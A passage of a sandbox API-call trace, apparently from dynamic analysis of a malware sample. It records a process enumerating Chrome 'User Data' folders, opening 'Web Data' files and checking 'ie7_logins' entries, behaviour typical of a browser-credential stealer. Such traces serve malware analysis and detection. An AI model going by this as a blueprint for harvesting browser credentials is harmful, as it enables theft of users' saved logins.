dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.144] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.144] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.144] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.144] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.144] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d970 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x5ec250, libNewSize=0x58d970) returned 0x0 [0590.144] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x56ff38 [0590.144] LocalFree (hMem=0x58d970) returned 0x0 [0590.144] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d970 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x16, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:SetSize (This=0x5ec250, libNewSize=0x58d970) returned 0x0 [0590.145] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x56fe98 [0590.145] LocalFree (hMem=0x58d970) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x20, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.145] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.145] LocalAlloc (uFlags=0x40, uBytes=0xf9) returned 0x578d48 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x21, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:SetSize (This=0x5ec250, libNewSize=0x578d48) returned 0x0 [0590.145] LocalAlloc (uFlags=0x40, uBytes=0x101) returned 0x5d1178 [0590.145] LocalFree (hMem=0x578d48) returned 0x0 [0590.145] LocalFree (hMem=0x570078) returned 0x0 [0590.145] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.145] lstrcmpiA (lpString1="ie7_logins", lpString2="logins") returned -1 [0590.145] LocalFree (hMem=0x58d548) returned 0x0 [0590.145] LocalFree (hMem=0x56ff38) returned 0x0 [0590.145] LocalFree (hMem=0x56fe98) returned 0x0 [0590.145] LocalFree (hMem=0x58d970) returned 0x0 [0590.145] LocalFree (hMem=0x5d1178) returned 0x0 [0590.145] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0xb0b1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0xb0b1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0xb0b2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.145] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.145] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x57ea78, libOffset=0xb0b3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.145] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.145] LocalFree (hMem=0x2f09968) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.145] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.145] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.145] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.146] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0x9d) returned 0x5d1978 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x5ec250, libNewSize=0x5d1978) returned 0x0 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0xa5) returned 0x5d3958 [0590.146] LocalFree (hMem=0x5d1978) returned 0x0 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d548 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x28, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x5ec250, libNewSize=0x58d548) returned 0x0 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x56ff38 [0590.146] LocalFree (hMem=0x58d548) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x5ec250, libOffset=0x32, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.146] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.146] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.146] lstrcmpiA (lpString1="ie7_logins", lpString2="logins") returned -1 [0590.146] LocalFree (hMem=0x58d970) returned 0x0 [0590.146] LocalFree (hMem=0x5d3958) returned 0x0 [0590.146] LocalFree (hMem=0x56ff38) returned 0x0 [0590.146] LocalFree (hMem=0x58d548) returned 0x0 [0590.146] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.146] LocalFree (hMem=0x56fe98) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0xb707, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0xb707, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0xb708, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.146] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.146] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.146] IStream:LockRegion (This=0x57ea78, libOffset=0xb709, cb=0x0, dwLockType=0x0) returned 0x0 [0590.146] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.147] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.147] LocalFree (hMem=0x2f09968) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.147] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0x8f) returned 0x58d970 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x58d970) returned 0x0 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.147] LocalFree (hMem=0x58d970) returned 0x0 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d970 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x1a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x58d970) returned 0x0 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x570078 [0590.147] LocalFree (hMem=0x58d970) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x24, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0xb5) returned 0x2ed72a0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.147] IStream:LockRegion (This=0x5ec250, libOffset=0x25, cb=0x0, dwLockType=0x0) returned 0x0 [0590.147] IStream:SetSize (This=0x5ec250, libNewSize=0x2ed72a0) returned 0x0 [0590.147] LocalAlloc (uFlags=0x40, uBytes=0xbd) returned 0x5b7378 [0590.147] LocalFree (hMem=0x2ed72a0) returned 0x0 [0590.148] LocalFree (hMem=0x56fe98) returned 0x0 [0590.148] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.148] lstrcmpiA (lpString1="ie7_logins", lpString2="logins") returned -1 [0590.148] LocalFree (hMem=0x58d548) returned 0x0 [0590.148] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.148] LocalFree (hMem=0x570078) returned 0x0 [0590.148] LocalFree (hMem=0x58d970) returned 0x0 [0590.148] LocalFree (hMem=0x5b7378) returned 0x0 [0590.148] LocalFree (hMem=0x56ff38) returned 0x0 [0590.148] LocalFree (hMem=0x2ef98e0) returned 0x0 [0590.148] LocalFree (hMem=0x2ee9858) returned 0x0 [0590.148] IUnknown:Release (This=0x57ea78) returned 0x0 [0590.148] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.148] lstrlenW (lpString="\\") returned 1 [0590.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.148] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1178 [0590.148] lstrlenW (lpString="Web Data-journal") returned 16 [0590.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.148] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x5d5128 [0590.148] LocalFree (hMem=0x5d1178) returned 0x0 [0590.148] StrStrIW (lpFirst="Web Data-journal", lpSrch="Web Data") returned="Web Data-journal" [0590.148] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52db80 | out: ppstm=0x52db80*=0x57ea78) returned 0x0 [0590.148] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.148] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.148] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x0, lpOverlapped=0x0) returned 1 [0590.148] CloseHandle (hObject=0x5ac) returned 1 [0590.148] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.148] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.148] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.148] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.148] IUnknown:Release (This=0x57ea78) returned 0x0 [0590.148] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.148] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.148] LocalFree (hMem=0x5d0c00) returned 0x0 [0590.148] LocalFree (hMem=0x578c40) returned 0x0 [0590.148] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.149] lstrcmpiW (lpString1="EVWhitelist", lpString2=".") returned 1 [0590.149] lstrcmpiW (lpString1="EVWhitelist", lpString2="..") returned 1 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.149] lstrlenW (lpString="\\") returned 1 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.149] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.149] lstrlenW (lpString="EVWhitelist") returned 11 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.149] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d0c00 [0590.149] LocalFree (hMem=0x578c40) returned 0x0 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 67 [0590.149] lstrlenW (lpString="\\*.*") returned 4 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 67 [0590.149] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5d1178 [0590.149] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.149] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.149] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.149] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.149] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.149] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.149] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.149] LocalFree (hMem=0x5d1178) returned 0x0 [0590.149] LocalFree (hMem=0x5d0c00) returned 0x0 [0590.149] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.149] lstrcmpiW (lpString1="FileTypePolicies", lpString2=".") returned 1 [0590.149] lstrcmpiW (lpString1="FileTypePolicies", lpString2="..") returned 1 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.149] lstrlenW (lpString="\\") returned 1 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.149] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.149] lstrlenW (lpString="FileTypePolicies") returned 16 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.149] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x5ec228 [0590.149] LocalFree (hMem=0x578c40) returned 0x0 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 72 [0590.149] lstrlenW (lpString="\\*.*") returned 4 [0590.149] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 72 [0590.149] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5ec350 [0590.149] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.150] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.150] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.150] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.150] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.150] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.150] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.150] LocalFree (hMem=0x5ec350) returned 0x0 [0590.150] LocalFree (hMem=0x5ec228) returned 0x0 [0590.150] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.150] lstrlenW (lpString="\\") returned 1 [0590.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.150] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.150] lstrlenW (lpString="First Run") returned 9 [0590.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.150] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5d0c00 [0590.150] LocalFree (hMem=0x578c40) returned 0x0 [0590.150] StrStrIW (lpFirst="First Run", lpSrch="Web Data") returned 0x0 [0590.150] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.150] lstrlenW (lpString="\\") returned 1 [0590.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.150] LocalAlloc 